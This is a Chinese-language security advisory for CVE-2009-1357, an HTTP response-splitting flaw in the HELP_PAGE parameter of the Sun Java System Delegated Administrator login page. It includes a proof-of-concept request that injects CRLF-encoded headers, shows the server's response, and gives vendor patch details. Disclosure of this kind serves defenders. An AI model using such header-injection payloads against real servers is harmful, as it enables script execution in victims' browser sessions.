发布日期：2009-04-21
更新日期：2009-04-23

受影响系统：

Sun Java System Delegated Administrator 6.4
Sun Java System Delegated Administrator 6.3
Sun Java System Delegated Administrator 6.2

描述：

---

BUGTRAQ  ID: 34643
CVE(CAN) ID: CVE-2009-1357

Delegated Administrator允许在Sun Java通讯套件（如Messaging Server和Calendar Server）使用的LDAP目录中置备组织（域）、用户、组和资源。

Delegated Administrator的/da/DA/Login文件没有正确的过滤HELP_PAGE参数输入便返回给了用户。远程攻击者可以在提交的请求中包含任意HTTP头，该头会在响应中发送给用户，导致在用户浏览器会话中执行任意HTML和脚本代码。

<*来源：Core Security Technologies
  
  链接：http://secunia.com/advisories/34760/
        http://marc.info/?l=bugtraq&m=124035514826941&w=2
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-255928-1
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ openssl s_client -connect &lt;server&gt;:443

GET
/da/DA/Login?Login.HelpHREF=http://www.example.com/&amp;com_sun_web_ui_popup=false&amp;HELP_PAGE=/help/%0AX-Tag:%20Core%20Security%20Technologies%0A%0D&amp;jato.pageSession=
HTTP/1.1
Host: &lt;server&gt;

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 20 Apr 2009 18:21:48 GMT
Cache-control: private
Location: &lt;server&gt;
X-Tag: Core Security Technologies
Content-length: 0
Content-type: text/htm

建议：

---

厂商补丁：

Sun
---
Sun已经为此发布了一个安全公告（Sun-Alert-255928）以及相应补丁:
Sun-Alert-255928：Security Vulnerability with HTTP Response Splitting in Sun Java System Delegated Administrator
链接：http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-255928-1

浏览次数：2491
严重程度：0（网友投票）